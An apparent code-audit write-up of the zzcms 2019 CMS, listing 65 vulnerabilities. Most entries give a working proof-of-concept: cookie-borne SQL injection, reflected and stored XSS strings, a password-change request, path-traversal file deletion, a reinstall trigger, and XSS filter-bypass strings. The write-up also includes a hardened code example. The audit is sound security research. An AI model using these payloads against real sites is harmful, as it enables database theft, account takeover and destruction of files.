Code audit: zzcms 2019

Published: 2024-08-02


The vulnerability list is as follows (65 vulnerabilities in total, each with an Exp, in chronological order):
To be continued...

1. install/index.php, line 8: variable overwrite vulnerability (affects install/step_6.php). Exp: http://127.0.0.3/install/index.php Post: admin=<script>alert(1)</script>&step=6
2. bluecms/admin/login.php, line 31: username and password are transmitted in plaintext in the Cookie, e.g. Cookie: PHPSESSID=k1lsech0g94r1mg7uh4rf5ado6; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;
3. uploadimg_form.php, line 64: reflected XSS. Exp: http://127.0.0.3/uploadimg_form.php?noshuiyin="/><script>alert(1);</script>
4. uploadimg_form.php, line 65: reflected XSS. Exp: http://127.0.0.3/uploadimg_form.php?imgid="/><script>alert(1);</script>
5. uploadimg_form.php, line 75: reflected XSS. Exp: http://127.0.0.3/uploadimg_form.php Post: flvurl=');</script><?php phpinfo(); ?><script>alert('1
7. ask/caina.php, line 21: reflected XSS. Exp: http://127.0.0.3/ask/caina.php Referer: 127.0.0.3";alert(1);parent.location="
8. ask/search.php, line 48: SQL injection. Exp: http://127.0.0.3/ask/search.php Cookie: askb=1' union SELECT 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
9. ask/search.php, line 56: SQL injection. Exp: http://127.0.0.3/ask/search.php Cookie: asks=1' union SELECT 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
10. ask/search.php, line 167: SQL injection (uncertain). Exp: http://127.0.0.3/ask/search.php Cookie: page_size_ask=1%3BINSERT INTO zzcms_ask (id, bigclassid,bigclassname,smallclassid,smallclassname,title,content,img,jifen,editor,sendtime,hit,elite,typeid,passed) VALUES (2,1,1,2,3,user(),'ggg',1,0,'hhh','2024-07-31 00:33:55',1,1,1,1) %3B
11. inc/function.php, line 109: IP spoofing vulnerability
12. ask/show.php, line 114: reflected XSS (uncertain). Exp: http://127.0.0.3/ask/show.php Post: id=1 Cookie: UserName="/><script>alert(1);</script><input name="hh" value="1
13. baojia/baojiaadd.php, line 174: SQL injection. Exp: http://127.0.0.3/baojia/baojiaadd.php Cookie: UserName=1' union select 1,2,3,4,5,6,7,user(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 limit 0,1#
14. baojia/search.php, line 119: SQL injection. Exp: http://127.0.0.3/baojia/search.php Cookie: b=' union select user(),1#
15. baojia/search.php, line 258: SQL injection. Exp: http://127.0.0.3/baojia/search.php Cookie: keyword=' union select user() limit 1,1#
16. baojia/search.php, line 258: SQL injection. Exp: http://127.0.0.3/baojia/search.php Cookie: province='  union select user() limit 1,1#
17. baojia/search.php, line 258: SQL injection. Exp: http://127.0.0.3/baojia/search.php Cookie: city='  union select user() limit 1,1#
18. baojia/search.php, line 258: SQL injection. Exp: http://127.0.0.3/baojia/search.php Cookie: xiancheng='  union select user() limit 1,1#
19. baojia/search.php, line 258: reflected XSS. Exp: http://127.0.0.3/baojia/search.php Cookie: keyword="/><script>alert(1)</script><meta name="keywords1" content="
20. baojia/search.php, line 258: reflected XSS. Exp: http://127.0.0.3/baojia/search.php Cookie: province="/><script>alert(1)</script><meta name="keywords1" content="
21. baojia/search.php, line 258: reflected XSS. Exp: http://127.0.0.3/baojia/search.php Cookie: city="/><script>alert(1)</script><meta name="keywords1" content="
22. baojia/search.php, line 258: reflected XSS. Exp: http://127.0.0.3/baojia/search.php Cookie: xiancheng="/><script>alert(1)</script><meta name="keywords1" content="
23. company/search.php, line 119: SQL injection. Exp: http://127.0.0.3/company/search.php Cookie: b=' union select user(),1#
24. company/search.php, line 136: SQL injection. Exp: http://127.0.0.3/company/search.php Cookie: companyb=1' union select 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
25. company/search.php, line 136: SQL injection. Exp: http://127.0.0.3/company/search.php Cookie: companys=1' union select 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
26. company/search.php, line 308: SQL injection. Exp: http://127.0.0.3/company/search.php Cookie: province='  union select user() limit 1,1#
27. company/search.php, line 308: SQL injection. Exp: http://127.0.0.3/company/search.php Cookie: city='  union select user() limit 1,1#
28. company/search.php, line 308: SQL injection. Exp: http://127.0.0.3/company/search.php Cookie: xiancheng='  union select user() limit 1,1#
29. baojia/search.php, line 308: reflected XSS. Exp: http://127.0.0.3/company/search.php Cookie: province="/><script>alert(1)</script><meta name="keywords1" content="
30. baojia/search.php, line 308: reflected XSS. Exp: http://127.0.0.3/company/search.php Cookie: city="/><script>alert(1)</script><meta name="keywords1" content="
31. baojia/search.php, line 308: reflected XSS. Exp: http://127.0.0.3/company/search.php Cookie: xiancheng="/><script>alert(1)</script><meta name="keywords1" content="
32. baojia/searchform.php, line 74: reflected XSS. Exp: http://127.0.0.3/company/searchform.php Cookie: companyb="/><script>alert(1)</script><meta name="keywords1" content="
33. inc/function.php, line 956: user impersonation vulnerability. Exp: Cookie: UserName=admin
34. dl/dl_download.php, line 36: SQL injection. Exp: http://127.0.0.3/dl/dl_download.php Cookie: UserName=' union select concat(999,user()) #
35. dl/dl_sendsms.php, line 77: SQL injection (in theory). Exp: http://127.0.0.3/dl/dl_sendsms.php Cookie: dlid=1' union select user()  #
36. dl/dladd.php, line 174: SQL injection. Exp: http://127.0.0.3/dl/dladd.php Cookie: UserName=' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,user(),8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 #
37. dl/search.php has 8 vulnerabilities similar to those in baojia/search.php; not repeated here
38. The vulnerabilities in job are similar to those in baojia; not repeated here
39. The vulnerabilities in pp are similar to those in baojia; not repeated here
40. The vulnerabilities in special are similar to those in baojia; not repeated here
41. The vulnerabilities in zs are similar to those in baojia; not repeated here
42. The vulnerabilities in zh are similar to those in baojia; not repeated here
43. The vulnerabilities in wangkan are similar to those in baojia; not repeated here
44. one/getpassword.php, line 73: arbitrary user password change vulnerability. Exp: http://127.0.0.3/one/getpassword.php Post: action=step3&username=admin&passwordtrue=admin888
45. zs/dl_liuyan_save.php, line 52: CSRF. Exp: http://127.0.0.3/zs/dl_liuyan_save.php Post: token=1&name=a Cookie: token=1 Referer: baidu.com";alert(1);parent.location="
46. zs/dl_liuyan_save.php, line 52: reflected XSS. Exp: http://127.0.0.3/zs/dl_liuyan_save.php Post: token=1&name=a Cookie: token=1 Referer: baidu.com";alert(1);parent.location="
47. zs/dl_liuyan_save.php, line 53: CSRF. Exp: http://127.0.0.3/zs/dl_liuyan_save.php Post: token=1&tel=a Cookie: token=1 Referer: baidu.com";alert(1);parent.location="
48. zs/dl_liuyan_save.php, line 53: reflected XSS. Exp: http://127.0.0.3/zs/dl_liuyan_save.php Post: token=1&tel=a Cookie: token=1 Referer: baidu.com";alert(1);parent.location="
49. ask/caina.php, line 21: CSRF. Exp: http://127.0.0.3/ask/caina.php Referer: baidu.com";alert(1);parent.location="
50. zs/dl_liuyan_save.php, line 111: CSRF. Exp: http://127.0.0.3/zs/dl_liuyan_save.php Post: token=1&name=a Cookie: token=1 Referer: baidu.com";alert(1);parent.location="
51. zs/dl_liuyan_save.php, line 111: reflected XSS. Exp: http://127.0.0.3/zs/dl_liuyan_save.php Post: token=1&name=a Cookie: token=1 Referer: baidu.com";alert(1);parent.location="
52. zt/top.php, line 21: SQL injection (in theory), also affects zt/adv.php. Exp: http://'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,user()#.1.com/zt/top.php
53. reg/sendmailagain.php, line 40: temporary user password disclosure vulnerability. Exp: http://127.0.0.3/reg/sendmailagain.php Post: username=admin&newemail=1@qq.com
54. user/adv.php, line 52: arbitrary image file deletion. Exp: http://127.0.0.3/user/adv.php Post: action=modify&img=http://127.0.0.3/1.php;jpg&oldimg=test/../uploadfiles/../image/h.gif
55. user/adv2.php, line 67: SQL injection. Exp: http://127.0.0.3/user/adv2.php Post: action=modify&id=0 union select 1,2,3,4,5,6,7,8,9,user(),1,2,3,4 #
56. user/login.php, line 111: reflected XSS. Exp: http://127.0.0.3/user/login.php Cookie: UserName=</span></div><script>alert(1)</script><div><span>
57. user/adv.php, line 120: reflected XSS. Exp: http://127.0.0.3/user/adv.php Post: action=add&advlink=' οnclick=alert(1) '&adv=123
58. admin/ad_user_manage.php, line 52: second-order SQL injection. Exp1: http://127.0.0.3/admin/ad_user_manage.php?action=pass Post: id=1  Exp2: http://127.0.0.3/user/adv.php Post: action=add&advlink=hhh&adv=123&img=',title=user() #
59. zh/show.php, line 29: stored XSS (caused by the stripfxg function). Exp: http://127.0.0.3/zh/show.php?id=1
60. admin/dl_data.php, line 19: arbitrary file deletion. Exp: http://127.0.0.3/admin/dl_data.php?action=del&filename=../1.php
61. user/ask.php, line 20: stored XSS (caused by markit(); triggered when viewing the bad-operation log in the admin backend). Exp: http://127.0.0.3/user/ask.php?do=modify&page=1&id=1&aaa=<sCrIpT>alert(/xss/)</ScRiPt>
62. install/index.php, line 21: site reinstallation vulnerability. http://127.0.0.3/install/index.php Post: step=2
63. admin/deluser.php, line 19: arbitrary file deletion
64. admin/del.php, line 19: arbitrary directory deletion
65. admin/uploadfile_nouse.php, line 19: arbitrary file deletion


// This block only runs when GET or POST data is present, so a cookie-only request
// escapes zc_check() entirely; the extract() calls also let request parameters
// overwrite script variables (variable overwrite).
if($_REQUEST){
	$_POST =zc_check($_POST);
	$_GET =zc_check($_GET);
	$_COOKIE =zc_check($_COOKIE);
	@extract($_POST);
	@extract($_GET);
}
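The two failure modes of the block above side by side with a hardened form, written here as an added example (not zzcms's own code). It assumes zc_check() takes an array and returns a sanitized copy, as in the snippet; the stand-in sanitizer and the sample inputs are constructed for illustration and mirror findings 1 and 13 in the list.

```php
<?php
// Added example, not zzcms code. Stand-in for the project's zc_check():
// same shape (array in, sanitized array out), escaping only for illustration.
function zc_check(array $data): array {
    return array_map(
        fn($v) => is_array($v) ? zc_check($v) : htmlspecialchars($v, ENT_QUOTES, 'UTF-8'),
        $data
    );
}

// Vulnerable pattern from the page: sanitization is skipped when the request
// carries only cookies, and extract() lets ?admin=... overwrite $admin.
function vulnerable_bootstrap(array $get, array $post, array $cookie): array {
    $admin = 0;                      // value the script intends to use
    if ($get || $post) {             // empty for a cookie-only request
        $post   = zc_check($post);
        $get    = zc_check($get);
        $cookie = zc_check($cookie);
        extract($post);              // request keys become local variables
        extract($get);
    }
    return ['admin' => $admin, 'cookie' => $cookie];
}

// Hardened form: sanitize every source unconditionally and never import
// request keys into scope; read each parameter explicitly with a type.
function hardened_bootstrap(array $get, array $post, array $cookie): array {
    $admin  = 0;
    $post   = zc_check($post);
    $get    = zc_check($get);
    $cookie = zc_check($cookie);     // runs even when GET and POST are empty
    $step   = (int)($post['step'] ?? $get['step'] ?? 0);
    return ['admin' => $admin, 'step' => $step, 'cookie' => $cookie];
}

// Constructed inputs: a cookie-only request and an admin= query parameter.
$r = vulnerable_bootstrap([], [], ['UserName' => "' union select 1 #"]);
var_dump($r['cookie']['UserName']);   // unchanged: the cookie was never sanitized
$r = vulnerable_bootstrap(['admin' => '<script>'], [], []);
var_dump($r['admin']);                // "&lt;script&gt;": $admin was overwritten
$r = hardened_bootstrap(['admin' => '<script>'], [], ['UserName' => "' union select 1 #"]);
var_dump($r['admin'], $r['cookie']['UserName']);  // 0 and an escaped cookie value
```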



// In user/del.php, if the img field of any table in the database can be controlled, arbitrary file deletion is possible

// "/><?php phpinfo();?><meta name="keywords1" content="

// htmlspecialchars() by default only encodes double quotes; although double quotes and <> cannot be used, ' can, so our single quote is very likely usable.
//<scri<!--test-->pt>alert(111)</sc<!--test-->ript>
//<SCrIpt>alert(1)</SCrIpt>